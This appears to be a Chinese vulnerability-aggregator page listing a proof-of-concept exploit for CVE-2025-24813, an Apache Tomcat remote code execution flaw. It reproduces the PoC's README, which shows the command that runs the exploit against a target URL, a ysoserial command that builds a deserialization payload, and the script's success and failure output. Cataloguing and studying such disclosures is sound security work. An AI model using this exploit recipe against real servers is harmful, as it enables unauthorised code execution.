POC详情: 680e490d9ab802c068392212307e1529968e4588

来源
https://github.com/Alaatk/CVE-2025-24813-POC
关联漏洞
标题: Apache Tomcat 环境问题漏洞 (CVE-2025-24813)
描述:Apache Tomcat是美国阿帕奇(Apache)基金会的一款轻量级Web应用服务器。用于实现对Servlet和JavaServer Page(JSP)的支持。 Apache Tomcat 11.0.0-M1至11.0.2版本、10.1.0-M1至10.1.34版本和9.0.0.M1至9.0.98版本存在环境问题漏洞。攻击者利用该漏洞可以远程执行代码或泄露敏感信息。
描述
CVE-2025-24813 Apache Tomcat RCE Proof of Concept (PoC)
介绍
# CVE-2025-24813 Apache Tomcat RCE PoC
PoC for CVE-2025-24813, a Remote Code Execution (RCE) vulnerability in Apache Tomcat. 


---
## Usage
```
python3 CVE-2025-24813.py --url <target_url>
```
---
#### Test Payload
The code already has a base64 encoded payload generated with ysoserial (https://github.com/frohoff/ysoserial) which creates a file RCE-success in /tmp as following:
```
java -jar ysoserial-all.jar CommonsBeanutils1 "touch /tmp/RCE-success" | base64 -w 0
```
---
## Output
* Successful Exploit:
```
[+] Exploit most likely succeeded
```

* Failed Exploit:
```
[-] Exploit failed with status code: {status_code}, instead of 500,409
```
文件快照

 [4.0K]  /data/pocs/680e490d9ab802c068392212307e1529968e4588
├── [5.2K]  CVE-2025-24813.py
├── [ 80K]  RCE-success.png
└── [ 650]  README.md

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。